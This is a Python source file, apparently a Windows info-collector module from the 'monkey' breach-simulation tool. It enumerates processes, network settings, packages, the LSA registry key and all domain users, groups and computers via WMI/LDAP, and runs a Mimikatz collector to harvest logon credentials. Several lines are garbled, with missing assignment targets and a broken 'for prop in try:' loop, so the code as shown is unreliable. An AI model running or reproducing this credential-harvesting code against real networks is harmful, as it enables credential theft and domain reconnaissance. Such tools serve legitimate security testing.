import os import logging import traceback import sys sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import wmi import win32com import _winreg from mimikatz_collector import MimikatzCollector from . import InfoCollector LOG = logging.getLogger(__name__) __author__ = 'uri' WMI_CLASSES = {"Win32_OperatingSystem", "Win32_ComputerSystem", "Win32_LoggedOnUser", "Win32_UserAccount", "Win32_UserProfile", "Win32_Group", "Win32_GroupUser", "Win32_Product", "Win32_Service", "Win32_OptionalFeature"} # These wmi queries are able to return data about all the users & machines in the domain. # For these queries to work, the monkey shohuld be run on a domain machine and # # monkey should run as *** SYSTEM *** !!! # WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", "DS_sAMAccountType", "ADSIPath", "DS_userAccountControl", "DS_objectSid", "DS_objectClass", "DS_memberOf", "DS_primaryGroupID", "DS_pwdLastSet", "DS_badPasswordTime", "DS_badPwdCount", "DS_lastLogon", "DS_lastLogonTimestamp", "DS_lastLogoff", "DS_logonCount", "DS_accountExpires"), "ds_group": ("DS_whenChanged", "DS_whenCreated", "DS_sAMAccountName", "DS_sAMAccountType", "DS_objectSid", "DS_objectClass", "DS_name", "DS_memberOf", "DS_member", "DS_instanceType", "DS_cn", "DS_description", "DS_distinguishedName", "ADSIPath"), "ds_computer": ("DS_dNSHostName", "ADSIPath", "DS_accountExpires", "DS_adminDisplayName", "DS_badPasswordTime", "DS_badPwdCount", "DS_cn", "DS_distinguishedName", "DS_instanceType", "DS_lastLogoff", "DS_lastLogon", "DS_lastLogonTimestamp", "DS_logonCount", "DS_objectClass", "DS_objectSid", "DS_operatingSystem", "DS_operatingSystemVersion", "DS_primaryGroupID", "DS_pwdLastSet", "DS_sAMAccountName", "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", "DS_whenChanged", "DS_whenCreated"), } def fix_obj_for_mongo(o): if type(o) == dict: return dict([(k, fix_obj_for_mongo(v)) for k, v in o.iteritems()]) elif type(o) in (list, tuple): return [fix_obj_for_mongo(i) for i in o] elif type(o) in (int, float, bool): return o elif type(o) in (str, unicode): # mongo dosn't like unprintable chars, so we use repr :/ return repr(o) elif hasattr(o, "__class__") and o.__class__ == wmi._wmi_object: return fix_wmi_obj_for_mongo(o) elif hasattr(o, "__class__") and o.__class__ == win32com.client.CDispatch: try: # objectSid property of ds_user is problematic and need thie special treatment. # ISWbemObjectEx interface. Class Uint8Array ? if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}": return o.Value except: pass try: return o.GetObjectText_() except: pass return repr(o) else: return repr(o) def fix_wmi_obj_for_mongo(o): row = {} for prop in try: value = getattr(o, prop) except wmi.x_wmi: # This happens in Win32_GroupUser when the user is a domain user. # For some reason, the wmi query for PartComponent fails. This table # is actually contains references to Win32_UserAccount and Win32_Group. # so instead of reading the content to the Win32_UserAccount, we store # only the id of the row in that table, and get all the other information # from that table while analyzing the data. value =[prop].value row[prop] = fix_obj_for_mongo(value) for method_name in o.methods: if not method_name.startswith("GetOwner"): continue method = getattr(o, method_name) try: value = method() value = fix_obj_for_mongo(value) row[method_name[3:]] = value except wmi.x_wmi: #LOG.error("Error running wmi method '%s'" % (method_name, )) #LOG.error(traceback.format_exc()) continue return row class WindowsInfoCollector(InfoCollector): """ System information collecting module for Windows operating systems """ def __init__(self): super(WindowsInfoCollector, self).__init__() def get_info(self): """ Collect Windows system information Hostname, process list and network subnets Tries to read credential secrets using mimikatz :return: Dict of system information """ LOG.debug("Running Windows collector") self.get_hostname() self.get_process_list() self.get_network_info() self.get_azure_info() self.get_wmi_info() self.get_reg_key(r"SYSTEM\CurrentControlSet\Control\Lsa") self.get_installed_packages() mimikatz_collector = MimikatzCollector() mimikatz_info = mimikatz_collector.get_logon_info()["credentials"].update(mimikatz_info)["mimikatz"] = mimikatz_collector.get_mimikatz_text() return def get_installed_packages(self):["installed_packages"] = os.popen("dism /online /get-packages").read()["installed_features"] = os.popen("dism /online /get-features").read() def get_wmi_info(self): for wmi_class_name in WMI_CLASSES:[wmi_class_name] = self.get_wmi_class(wmi_class_name) for wmi_class_name, props in WMI_LDAP_CLASSES.iteritems():[wmi_class_name] = self.get_wmi_class(wmi_class_name, "//./root/directory/ldap", props) def get_wmi_class(self, class_name, moniker="//./root/cimv2", properties=None): _wmi = wmi.WMI(moniker=moniker) try: if not properties: wmi_class = getattr(_wmi, class_name)() else: wmi_class = getattr(_wmi, class_name)(properties) except wmi.x_wmi: #LOG.error("Error getting wmi class '%s'" % (class_name, )) #LOG.error(traceback.format_exc()) return return fix_obj_for_mongo(wmi_class) def get_reg_key(self, subkey_path, store=_winreg.HKEY_LOCAL_MACHINE): key = _winreg.ConnectRegistry(None, store) subkey = _winreg.OpenKey(key, subkey_path) d = dict([_winreg.EnumValue(subkey, i)[:2] for i in xrange(_winreg.QueryInfoKey(subkey)[0])]) d = fix_obj_for_mongo(d)[subkey_path] = d subkey.Close() key.Close()